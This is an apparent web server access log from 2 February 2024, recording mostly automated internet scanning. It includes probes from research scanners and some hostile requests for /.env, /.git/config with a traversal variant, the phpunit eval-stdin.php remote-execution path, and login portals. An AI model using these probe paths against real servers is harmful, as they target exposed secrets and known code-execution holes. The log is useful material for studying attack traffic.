192.241.225.74 - - [02/Feb/2024:03:16:22 +0100] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
192.241.225.74 - - [02/Feb/2024:03:16:32 +0100] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
192.241.225.74 - - [02/Feb/2024:03:16:36 +0100] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
192.241.225.74 - - [02/Feb/2024:03:16:42 +0100] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
192.241.225.74 - - [02/Feb/2024:03:16:54 +0100] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
192.241.225.74 - - [02/Feb/2024:03:17:35 +0100] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
176.97.210.231 - - [02/Feb/2024:03:17:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
192.241.225.74 - - [02/Feb/2024:03:17:56 +0100] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
192.241.225.74 - - [02/Feb/2024:03:18:49 +0100] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
192.241.225.74 - - [02/Feb/2024:03:18:52 +0100] "GET /druid/index.html HTTP/1.1" 404 321 "-" "Mozilla/5.0 zgrab/0.x"
146.19.24.23 - - [02/Feb/2024:03:19:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
65.49.20.66 - - [02/Feb/2024:03:20:38 +0100] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.23 - - [02/Feb/2024:03:21:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
205.210.31.52 - - [02/Feb/2024:03:23:38 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.52 - - [02/Feb/2024:03:23:38 +0100] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.23 - - [02/Feb/2024:03:26:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
148.153.45.238 - - [02/Feb/2024:03:30:30 +0100] "GET /YBtM HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.238 - - [02/Feb/2024:03:30:31 +0100] "GET /oPWG HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.238 - - [02/Feb/2024:03:30:31 +0100] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.238 - - [02/Feb/2024:03:30:35 +0100] "GET /jquery-3.3.1.slim.min.js HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.238 - - [02/Feb/2024:03:30:36 +0100] "GET /aab9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
148.153.45.238 - - [02/Feb/2024:03:30:36 +0100] "GET /jquery-3.3.2.slim.min.js HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0"
12.215.197.165 - - [02/Feb/2024:03:36:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
192.155.88.231 - - [02/Feb/2024:03:47:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
172.104.11.51 - - [02/Feb/2024:03:47:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.94.145.59 - - [02/Feb/2024:03:56:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.59 - - [02/Feb/2024:03:56:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.59 - - [02/Feb/2024:03:56:06 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.59 - - [02/Feb/2024:03:56:06 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
198.235.24.104 - - [02/Feb/2024:04:03:27 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
162.216.150.250 - - [02/Feb/2024:04:04:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.79.163.53 - - [02/Feb/2024:04:11:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.79.172.21 - - [02/Feb/2024:04:12:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
69.164.217.74 - - [02/Feb/2024:04:16:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.79.172.21 - - [02/Feb/2024:04:16:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
66.45.237.154 - - [02/Feb/2024:04:20:03 +0100] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
192.155.88.231 - - [02/Feb/2024:04:20:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.155.90.118 - - [02/Feb/2024:04:21:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
146.19.24.23 - - [02/Feb/2024:04:22:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.233.75.51 - - [02/Feb/2024:04:23:58 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [02/Feb/2024:04:23:58 +0100] "GET /Phpinfo/profiler HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [02/Feb/2024:04:23:59 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [02/Feb/2024:04:23:59 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
74.50.80.82 - - [02/Feb/2024:04:25:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
194.233.75.51 - - [02/Feb/2024:04:25:42 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [02/Feb/2024:04:25:42 +0100] "GET /Phpinfo/profiler HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [02/Feb/2024:04:25:42 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [02/Feb/2024:04:25:43 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
205.210.31.72 - - [02/Feb/2024:04:26:12 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
91.92.249.164 - - [02/Feb/2024:04:28:46 +0100] "HEAD / HTTP/1.0" 200 - "-" "-"
91.92.249.164 - - [02/Feb/2024:04:28:48 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
91.92.249.164 - - [02/Feb/2024:04:28:49 +0100] "GET /static../.git/config HTTP/1.1" 404 325 "-" "Go-http-client/1.1"
91.92.249.164 - - [02/Feb/2024:04:28:49 +0100] "GET /wp-content/plugins/.git/config HTTP/1.1" 404 335 "-" "Go-http-client/1.1"
91.92.249.164 - - [02/Feb/2024:04:28:49 +0100] "GET /admin/.git/config HTTP/1.1" 404 322 "-" "Go-http-client/1.1"
91.92.249.164 - - [02/Feb/2024:04:28:49 +0100] "GET /app/.git/config HTTP/1.1" 404 320 "-" "Go-http-client/1.1"
146.19.24.23 - - [02/Feb/2024:04:29:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.33.87.154 - - [02/Feb/2024:04:30:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
18.130.165.67 - - [02/Feb/2024:04:33:54 +0100] "" 501 315 "-" "-"
18.130.165.67 - - [02/Feb/2024:04:34:57 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.130.165.67 - - [02/Feb/2024:04:35:50 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.130.165.67 - - [02/Feb/2024:04:36:26 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.130.165.67 - - [02/Feb/2024:04:37:12 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.130.165.67 - - [02/Feb/2024:04:37:45 +0100] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.130.165.67 - - [02/Feb/2024:04:38:51 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.130.165.67 - - [02/Feb/2024:04:39:27 +0100] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.130.165.67 - - [02/Feb/2024:04:40:31 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.130.165.67 - - [02/Feb/2024:04:41:05 +0100] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
146.19.24.23 - - [02/Feb/2024:04:41:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.106.29.124 - - [02/Feb/2024:04:42:13 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
18.130.165.67 - - [02/Feb/2024:04:42:17 +0100] "\x16\x03\x01" 501 318 "-" "-"
193.106.29.124 - - [02/Feb/2024:04:42:29 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
18.130.165.67 - - [02/Feb/2024:04:42:51 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
45.79.168.172 - - [02/Feb/2024:04:43:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
18.130.165.67 - - [02/Feb/2024:04:43:57 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.130.165.67 - - [02/Feb/2024:04:44:26 +0100] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
45.33.87.154 - - [02/Feb/2024:04:44:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
192.155.90.118 - - [02/Feb/2024:04:44:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
18.130.165.67 - - [02/Feb/2024:04:45:27 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.130.165.67 - - [02/Feb/2024:04:45:58 +0100] "GET /logon.htm HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
205.210.31.39 - - [02/Feb/2024:04:46:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
18.130.165.67 - - [02/Feb/2024:04:47:03 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.130.165.67 - - [02/Feb/2024:04:47:34 +0100] "GET /login.jsp HTTP/1.1" 404 314 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.130.165.67 - - [02/Feb/2024:04:48:39 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.130.165.67 - - [02/Feb/2024:04:49:13 +0100] "GET /doc/index.html HTTP/1.1" 404 319 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
18.130.165.67 - - [02/Feb/2024:04:50:17 +0100] "\x16\x03\x01" 501 318 "-" "-"
18.130.165.67 - - [02/Feb/2024:04:50:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
74.50.80.82 - - [02/Feb/2024:04:51:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
162.243.136.62 - - [02/Feb/2024:04:54:54 +0100] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
162.243.136.62 - - [02/Feb/2024:04:54:55 +0100] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
162.243.136.62 - - [02/Feb/2024:04:55:02 +0100] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
34.123.157.46 - - [02/Feb/2024:04:55:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.1"
34.123.157.46 - - [02/Feb/2024:04:55:22 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "python-requests/2.28.1"
162.243.136.62 - - [02/Feb/2024:04:55:22 +0100] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
45.79.181.223 - - [02/Feb/2024:04:55:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
162.243.136.62 - - [02/Feb/2024:04:55:36 +0100] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
162.243.136.62 - - [02/Feb/2024:04:55:40 +0100] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
162.243.136.62 - - [02/Feb/2024:04:55:40 +0100] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
162.243.136.62 - - [02/Feb/2024:04:55:41 +0100] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
146.19.24.23 - - [02/Feb/2024:04:55:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
162.243.136.62 - - [02/Feb/2024:04:55:49 +0100] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
162.243.136.62 - - [02/Feb/2024:04:56:01 +0100] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
205.210.31.247 - - [02/Feb/2024:05:00:30 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
194.233.75.51 - - [02/Feb/2024:05:02:38 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [02/Feb/2024:05:02:39 +0100] "GET /Phpinfo/profiler HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [02/Feb/2024:05:02:39 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
194.233.75.51 - - [02/Feb/2024:05:02:40 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
162.216.150.250 - - [02/Feb/2024:05:06:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
193.106.29.124 - - [02/Feb/2024:05:08:55 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
76.8.238.62 - - [02/Feb/2024:05:09:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
195.155.211.123 - - [02/Feb/2024:05:11:04 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
45.142.182.85 - - [02/Feb/2024:05:11:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
195.155.211.123 - - [02/Feb/2024:05:11:35 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
34.76.96.55 - - [02/Feb/2024:05:12:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
178.79.143.189 - - [02/Feb/2024:05:12:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
178.79.143.189 - - [02/Feb/2024:05:12:25 +0100] "\x16\x03\x01" 501 318 "-" "-"
178.79.143.189 - - [02/Feb/2024:05:12:25 +0100] "\x16\x03\x01" 501 318 "-" "-"
178.79.143.189 - - [02/Feb/2024:05:12:25 +0100] "\x16\x03\x01" 501 318 "-" "-"
195.155.211.123 - - [02/Feb/2024:05:12:28 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
45.142.182.85 - - [02/Feb/2024:05:12:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
193.106.29.124 - - [02/Feb/2024:05:12:58 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
198.199.100.133 - - [02/Feb/2024:05:13:36 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.100.133 - - [02/Feb/2024:05:14:09 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
195.155.211.123 - - [02/Feb/2024:05:14:31 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
195.155.211.123 - - [02/Feb/2024:05:14:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
198.199.100.133 - - [02/Feb/2024:05:14:45 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.100.133 - - [02/Feb/2024:05:14:48 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.100.133 - - [02/Feb/2024:05:14:51 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.100.133 - - [02/Feb/2024:05:14:54 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.100.133 - - [02/Feb/2024:05:15:03 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.100.133 - - [02/Feb/2024:05:15:08 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
45.33.87.154 - - [02/Feb/2024:05:15:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.199.100.133 - - [02/Feb/2024:05:15:25 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
198.199.100.133 - - [02/Feb/2024:05:15:27 +0100] "GET /portal/redlion HTTP/1.1" 404 319 "-" "Mozilla/5.0 zgrab/0.x"
172.104.11.4 - - [02/Feb/2024:05:15:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
195.155.211.123 - - [02/Feb/2024:05:16:04 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
198.235.24.243 - - [02/Feb/2024:05:16:49 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.155.211.123 - - [02/Feb/2024:05:17:19 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
45.142.182.85 - - [02/Feb/2024:05:18:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
195.155.211.123 - - [02/Feb/2024:05:19:33 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
195.155.211.123 - - [02/Feb/2024:05:20:22 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
195.155.211.123 - - [02/Feb/2024:05:20:43 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
193.106.29.124 - - [02/Feb/2024:05:23:42 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
45.79.168.172 - - [02/Feb/2024:05:27:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
193.106.29.124 - - [02/Feb/2024:05:28:28 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
74.50.80.82 - - [02/Feb/2024:05:29:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
190.60.109.187 - - [02/Feb/2024:05:34:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
143.110.218.206 - - [02/Feb/2024:05:34:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
109.74.204.53 - - [02/Feb/2024:05:39:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
109.74.204.53 - - [02/Feb/2024:05:39:19 +0100] "\x16\x03\x01" 501 318 "-" "-"
109.74.204.53 - - [02/Feb/2024:05:39:19 +0100] "\x16\x03\x01" 501 318 "-" "-"
109.74.204.53 - - [02/Feb/2024:05:39:19 +0100] "\x16\x03\x01" 501 318 "-" "-"
109.74.204.199 - - [02/Feb/2024:05:40:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
109.74.204.199 - - [02/Feb/2024:05:40:01 +0100] "\x16\x03\x01" 501 318 "-" "-"
109.74.204.199 - - [02/Feb/2024:05:40:01 +0100] "\x16\x03\x01" 501 318 "-" "-"
109.74.204.199 - - [02/Feb/2024:05:40:01 +0100] "\x16\x03\x01" 501 318 "-" "-"
64.62.197.114 - - [02/Feb/2024:05:40:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
64.62.197.109 - - [02/Feb/2024:05:42:36 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0"
64.62.197.119 - - [02/Feb/2024:05:43:26 +0100] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
178.79.143.249 - - [02/Feb/2024:05:44:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
178.79.143.249 - - [02/Feb/2024:05:44:33 +0100] "\x16\x03\x01" 501 318 "-" "-"
178.79.143.249 - - [02/Feb/2024:05:44:33 +0100] "\x16\x03\x01" 501 318 "-" "-"
178.79.143.249 - - [02/Feb/2024:05:44:33 +0100] "\x16\x03\x01" 501 318 "-" "-"
146.19.24.23 - - [02/Feb/2024:05:48:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [02/Feb/2024:05:49:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.78 - - [02/Feb/2024:05:49:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
157.254.236.32 - - [02/Feb/2024:05:50:40 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
157.254.236.32 - - [02/Feb/2024:05:50:40 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
146.19.24.23 - - [02/Feb/2024:05:52:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [02/Feb/2024:05:52:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
146.19.24.23 - - [02/Feb/2024:05:52:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
3.91.150.187 - - [02/Feb/2024:05:58:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/57.0.3085.110 Safari/537.32"
146.19.24.23 - - [02/Feb/2024:05:59:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
205.210.31.69 - - [02/Feb/2024:06:02:28 +0100] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.69 - - [02/Feb/2024:06:02:29 +0100] "\x16\x03\x01" 501 318 "-" "-"
65.49.20.67 - - [02/Feb/2024:06:10:26 +0100] "\x16\x03\x01" 501 318 "-" "-"
64.62.197.86 - - [02/Feb/2024:06:10:48 +0100] "\x16\x03\x01" 501 318 "-" "-"
64.62.197.206 - - [02/Feb/2024:06:10:54 +0100] "\x16\x03\x01" 501 318 "-" "-"
74.82.47.4 - - [02/Feb/2024:06:11:07 +0100] "\x16\x03\x01" 501 318 "-" "-"
74.50.80.82 - - [02/Feb/2024:06:12:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
146.19.24.23 - - [02/Feb/2024:06:15:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
176.58.124.80 - - [02/Feb/2024:06:17:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
176.58.124.80 - - [02/Feb/2024:06:17:52 +0100] "\x16\x03\x01" 501 318 "-" "-"
176.58.124.80 - - [02/Feb/2024:06:17:52 +0100] "\x16\x03\x01" 501 318 "-" "-"
176.58.124.80 - - [02/Feb/2024:06:17:52 +0100] "\x16\x03\x01" 501 318 "-" "-"
